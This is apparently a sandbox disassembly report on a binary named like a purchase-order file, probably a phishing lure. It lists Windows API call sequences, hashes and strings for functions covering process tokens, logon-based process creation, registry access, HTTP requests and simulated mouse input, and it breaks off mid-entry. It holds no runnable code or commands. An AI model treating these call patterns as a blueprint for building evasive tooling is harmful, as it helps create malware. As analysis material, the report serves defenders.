                                                                    • API String ID: 1827037458-0
                                                                    • Opcode ID: fcfeb977d9557d34dad68541a120dbd144eacc93a3c78f08b677749312e8f6f9
                                                                    • Instruction ID: 306f11e84f6d526cec73dd9144d55368ce7e2010bf187aa524f23c64f5e4e20c
                                                                    • Opcode Fuzzy Hash: fcfeb977d9557d34dad68541a120dbd144eacc93a3c78f08b677749312e8f6f9
                                                                    • Instruction Fuzzy Hash: 76419F71104700AFD710DF25CC88BAA7BE8FB46724F18462AFAA4C62E1C7349985EB61
                                                                    APIs
                                                                    • ShowWindow.USER32(00CD57B0,00000000,017B5A08,?,?,00CD57B0,?,00C9B5A8,?,?), ref: 00C9B712
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00C9B736
                                                                    • ShowWindow.USER32(00CD57B0,00000000,017B5A08,?,?,00CD57B0,?,00C9B5A8,?,?), ref: 00C9B796
                                                                    • ShowWindow.USER32(00000000,00000004,?,00C9B5A8,?,?), ref: 00C9B7A8
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00C9B7CC
                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C9B7EF
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00C84E41,?,?,00000000,00000001), ref: 00C870AC
                                                                      • Part of subcall function 00C839A0: GetWindowRect.USER32(?,?), ref: 00C839B3
                                                                    • GetDesktopWindow.USER32 ref: 00C870D6
                                                                    • GetWindowRect.USER32(00000000), ref: 00C870DD
                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C8710F
                                                                      • Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                    • GetCursorPos.USER32(?), ref: 00C8713B
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C87199
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                    • String ID:
                                                                    • API String ID: 4137160315-0
                                                                    APIs
                                                                      • Part of subcall function 00C680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C680C0
                                                                      • Part of subcall function 00C680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C680CA
                                                                      • Part of subcall function 00C680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C680D9
                                                                      • Part of subcall function 00C680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C680E0
                                                                      • Part of subcall function 00C680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C680F6
                                                                    • GetLengthSid.ADVAPI32(?,00000000,00C6842F), ref: 00C688CA
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C688D6
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00C688DD
                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C688F6
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00C6842F), ref: 00C6890A
                                                                    • HeapFree.KERNEL32(00000000), ref: 00C68911
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                    • String ID:
                                                                    • API String ID: 3008561057-0
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C685E2
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00C685E9
                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C685F8
                                                                    • CloseHandle.KERNEL32(00000004), ref: 00C68603
                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C68632
                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C68646
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00C6B7B5
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C6B7C6
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C6B7CD
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00C6B7D5
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C6B7EC
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00C6B7FE
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C30193
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C3019B
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C301A6
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C301B1
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C301B9
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C301C1
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C753F9
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C7540F
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00C7541E
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7542D
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C75437
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7543E
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00C77243
                                                                    • EnterCriticalSection.KERNEL32(?,?,00C20EE4,?,?), ref: 00C77254
                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00C20EE4,?,?), ref: 00C77261
                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C20EE4,?,?), ref: 00C7726E
                                                                      • Part of subcall function 00C76C35: CloseHandle.KERNEL32(00000000,?,00C7727B,?,00C20EE4,?,?), ref: 00C76C3F
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C77281
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00C20EE4,?,?), ref: 00C77288
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C6899D
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00C689A9
                                                                    • CloseHandle.KERNEL32(?), ref: 00C689B2
                                                                    • CloseHandle.KERNEL32(?), ref: 00C689BA
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00C689C3
                                                                    • HeapFree.KERNEL32(00000000), ref: 00C689CA
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00C88613
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00C88722
                                                                    • VariantClear.OLEAUT32(?), ref: 00C8889A
                                                                      • Part of subcall function 00C77562: VariantInit.OLEAUT32(00000000), ref: 00C775A2
                                                                      • Part of subcall function 00C77562: VariantCopy.OLEAUT32(00000000,?), ref: 00C775AB
                                                                      • Part of subcall function 00C77562: VariantClear.OLEAUT32(00000000), ref: 00C775B7
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
• Opcode ID: 9b7c84373c43d2b3ab2e6e1fdb5fccc357ec953868c5747be44470e51c0bebdb
• Instruction ID: 8ecf91ae908ef6caee9fce32247410df4f05db45ff1b59ecc3127ee0c1420585
• Opcode Fuzzy Hash: 9b7c84373c43d2b3ab2e6e1fdb5fccc357ec953868c5747be44470e51c0bebdb
• Instruction Fuzzy Hash: 0F918E75604301DFCB10EF24C48495AB7F4EF89718F54892EF89A8B3A1DB31E94ADB52
APIs
  • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
• _memset.LIBCMT ref: 00C72B87
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C72BB6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C72C69
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C72C97
Strings
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
• Opcode ID: d81cf86272c82e39d8519a31c7710dbdfd908693abe2a9337dcb2681c5f97b74
• Instruction ID: 55d391421028701d3cb6df4f64a918b47cdc09777377595725d208e275443515
• Opcode Fuzzy Hash: d81cf86272c82e39d8519a31c7710dbdfd908693abe2a9337dcb2681c5f97b74
• Instruction Fuzzy Hash: C951C0716083019FE7269E28C845A6FB7E8EF65350F148A2DF8A9D3291DB70CE44E752
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C6D5D4
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C6D60A
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C6D61B
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C6D69D
Strings
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: 245593c9612ffcee14a12ea4dc5162536ba9e6061e1aa34a0f5da2f4b6faaca6
• Instruction ID: e3df6da83d9ff2d7a7f1bbd328ae341710044ec8350ad306ef528632bbb14f6f
• Opcode Fuzzy Hash: 245593c9612ffcee14a12ea4dc5162536ba9e6061e1aa34a0f5da2f4b6faaca6
• Instruction Fuzzy Hash: 68417DB1A00205EFDB25CF54C8C8B9A7BA9EF44314F1585ADF90A9F205D7B1DA40CBA0
APIs
• _memset.LIBCMT ref: 00C727C0
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C727DC
• DeleteMenu.USER32(?,00000007,00000000), ref: 00C72822
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CD5890,00000000), ref: 00C7286B
Strings
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: b4886ae3501a577992a5e6173739bcd49a52a64aefb30cf3e387906e15ae284e
• Instruction ID: e576adbed5139c5e706b166f7d84e177493b3482da9f4b481c64246e56921a76
• Opcode Fuzzy Hash: b4886ae3501a577992a5e6173739bcd49a52a64aefb30cf3e387906e15ae284e
• Instruction Fuzzy Hash: CB41AE722043419FD720DF25C884F5ABBE8EF85314F148A2EF8A9972D2D731A905DB63
APIs
• CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C8D7C5
  • Part of subcall function 00C1784B: _memmove.LIBCMT ref: 00C17899
Strings
Similarity
• API ID: BuffCharLower_memmove
• String ID: cdecl$none$stdcall$winapi
• API String ID: 3425801089-567219261
• Opcode ID: c6ed0eed1dc814a484a183d765a918a96083acf9788688969f73f16cc28458cd
• Instruction ID: ae17c69f4bd93bddf0b601a9278aa2219ea9e96686ff9c30ae3fbe0ac3efc6d9
• Opcode Fuzzy Hash: c6ed0eed1dc814a484a183d765a918a96083acf9788688969f73f16cc28458cd
• Instruction Fuzzy Hash: AF319E71904619ABCF00EF54C8559EEB3B4FF05324F108669F836A76D1DB31AE05DB80
APIs
  • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
  • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C68F14
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C68F27
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00C68F57
  • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
Strings
Similarity
• API ID: MessageSend$_memmove$ClassName
• String ID: ComboBox$ListBox
• API String ID: 365058703-1403004172
• Opcode ID: 1f70e6bae871eb1020526dbedb3a22591143faafec9189cdbdb6e11bcf632069
• Instruction ID: 141653f875dc701d0cec3c2c55aaccf1edb2fc41de34cbb6c2bb22f1d4ab7b16
• Opcode Fuzzy Hash: 1f70e6bae871eb1020526dbedb3a22591143faafec9189cdbdb6e11bcf632069
• Instruction Fuzzy Hash: 4021E471A04108BEDB24ABB0DC89DFFB779DF46320F14462AF421A71E1DF35494AAA50
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C81872
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C818A2
• InternetCloseHandle.WININET(00000000), ref: 00C818E9
  • Part of subcall function 00C82483: GetLastError.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C82498
  • Part of subcall function 00C82483: SetEvent.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C824AD
Strings
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: 9773757eb200906c178730e271be92a35d0cb03a3e6e3b9e405a42c85be4ee85
• Instruction ID: 748d8bc9666c824815bab96fa9b8f4b1da43192cc14803bf6ee433c22effcc26
• Opcode Fuzzy Hash: 9773757eb200906c178730e271be92a35d0cb03a3e6e3b9e405a42c85be4ee85
• Instruction Fuzzy Hash: 3E21B0B1510208BFEB11AB61CC8AFBF77EDEB48749F14412AF805D7180DB208E0667B4
APIs
  • Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
  • Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
  • Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C96461
• LoadLibraryW.KERNEL32(?), ref: 00C96468
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C9647D
• DestroyWindow.USER32(?), ref: 00C96485
Strings
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
• Opcode ID: 8d1ddd41133344ffccb1b468bda381952ba8d5f7e73b4ee5d508719129b1e3e4
• Instruction ID: 65daf98cc523315c56ca148d0b75c97c527f7747b0e9370b9549bc884331e71e
• Opcode Fuzzy Hash: 8d1ddd41133344ffccb1b468bda381952ba8d5f7e73b4ee5d508719129b1e3e4
• Instruction Fuzzy Hash: C7216D71210205BFEF108FA4DC98FBB77ADEB59764F104629FA60921E0D771DC51A760
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00C76DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C76DEF
• GetStdHandle.KERNEL32(0000000C), ref: 00C76E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C76E3B
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: b760179bc1e2c045c5dfe079b50ce25c33b5ee8e9e36bddc1a11457280729cb9
• Instruction ID: b46c799e0b1fe9950c99e2e23d9ac156278f2d9d4eba9f5cd77be016285c7d77
• Opcode Fuzzy Hash: b760179bc1e2c045c5dfe079b50ce25c33b5ee8e9e36bddc1a11457280729cb9
• Instruction Fuzzy Hash: CA218174600609AFDB309F29DC05B9E7BB4EF54720F20862AFDB4D72D0D77099519B60
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00C76E89
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C76EBB
• GetStdHandle.KERNEL32(000000F6), ref: 00C76ECC
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C76F06
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 7fedb044d3113df262f231ed60f07608639ef2cf42a80d9fca25c56654fcd849
• Instruction ID: bc211b6a0748a718c7267531dec0bbae286b3f01fb9f9b03968064177a87ef9f
• Opcode Fuzzy Hash: 7fedb044d3113df262f231ed60f07608639ef2cf42a80d9fca25c56654fcd849
• Instruction Fuzzy Hash: 4321A475500B059BDB209F69DC04B9A77A8EF45720F208A1AFCB5D72D0D770A951C761
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00C7AC54
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C7ACA8
• __swprintf.LIBCMT ref: 00C7ACC1
• SetErrorMode.KERNEL32(00000000,00000001,00000000,00C9F910), ref: 00C7ACFF
Strings
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu
                                                                    • API String ID: 3164766367-685833217
                                                                    • Opcode ID: 9376bcb3b07b9c7aa4d9a1f02952d158c08e18c0a703ee26dbf2e986ad18d641
                                                                    • Instruction ID: 0dd710abfd01a30efeac01f0d2be8e2e64b4252dc5ea9f0e922a6566da8e7cc0
                                                                    • Opcode Fuzzy Hash: 9376bcb3b07b9c7aa4d9a1f02952d158c08e18c0a703ee26dbf2e986ad18d641
                                                                    • Instruction Fuzzy Hash: 6D214131A00109EFCB10DF65C945EEE7BB8FF89714B1080A9F909DB251DA31EA45EB61
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00C71B19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                    • API String ID: 3964851224-769500911
                                                                    • Opcode ID: 75f36a6964fcf885ed3d7c9970eb864c59aa23fa725b6165c4d57cedb905a66b
                                                                    • Instruction ID: 325e0c32185fd3cf62bd8b7c688d95cec32b3b5e9e564ff6dd13f8e4cbe3fccd
                                                                    • Opcode Fuzzy Hash: 75f36a6964fcf885ed3d7c9970eb864c59aa23fa725b6165c4d57cedb905a66b
                                                                    • Instruction Fuzzy Hash: F11165719102088FCF00DF54D8519FEB7B4FF65304F148469D81597691EB325D0AEB54
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C8EC07
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C8EC37
                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C8ED6A
                                                                    • CloseHandle.KERNEL32(?), ref: 00C8EDEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                    • String ID:
                                                                    • API String ID: 2364364464-0
                                                                    • Opcode ID: a51311f48bb952f8035c2321f50410c5a0744adcc47c0b4e47f5fb338753d7ae
                                                                    • Instruction ID: a1c40ffcc427b847dc3a32dd9845fcb5373988e337a79a15cc9ac30f828f964c
                                                                    • Opcode Fuzzy Hash: a51311f48bb952f8035c2321f50410c5a0744adcc47c0b4e47f5fb338753d7ae
                                                                    • Instruction Fuzzy Hash: B2819D716043009FE720EF28C896F6AB7E5EF49710F04881DF999DB2D2DAB0AD45DB85
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 1559183368-0
                                                                    • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                    • Instruction ID: 1ef301eb67ddd39fa5b9b787140574da38843d496cc3e26b5d185cbaa7cf72de
                                                                    • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                    • Instruction Fuzzy Hash: F551C870A20B05DBDB289F69D88066E77B6AF40331F248729F835962D0D771EE909B41
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C900FD
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9013C
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C90183
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00C901AF
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C901BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                    • String ID:
                                                                    • API String ID: 3440857362-0
                                                                    • Opcode ID: 4a484055b91508002cc05ecc28b0a94c0db053a25e44b85c5b30162199ba3234
                                                                    • Instruction ID: 8d9112ff371cb0e6d994e0816511e88f9033322b8ae70bdbc6f36c41da57b4e6
                                                                    • Opcode Fuzzy Hash: 4a484055b91508002cc05ecc28b0a94c0db053a25e44b85c5b30162199ba3234
                                                                    • Instruction Fuzzy Hash: 3C514C31208204AFDB14EF54C885FAEB7E9FF84314F50491DF555872A2DB31EA45EB52
                                                                    APIs
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C8D927
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00C8D9AA
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C8D9C6
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00C8DA07
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C8DA21
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 327935632-0
                                                                    • Opcode ID: 8016933d111215ee38ac0f3b9a5877703bb01c59982aa86b47bbfe01b3ee1cc6
                                                                    • Instruction ID: 3d03bd2e70ec8f26604e02ebc1bd2587399b64cf3e8f0f74a481de30e0b33596
                                                                    • Opcode Fuzzy Hash: 8016933d111215ee38ac0f3b9a5877703bb01c59982aa86b47bbfe01b3ee1cc6
                                                                    • Instruction Fuzzy Hash: 51513935A04205DFCB04EFA8C4849EDB7B4FF49314B148069E856AB352DB31EE85EF91
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C7E61F
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C7E648
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C7E687
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C7E6AC
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C7E6B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1389676194-0
                                                                    • Opcode ID: 8bd79d75679c4ad9e02aeb7a34bdf1787f3c2e43c2aa6c46fffd22d04cce9e84
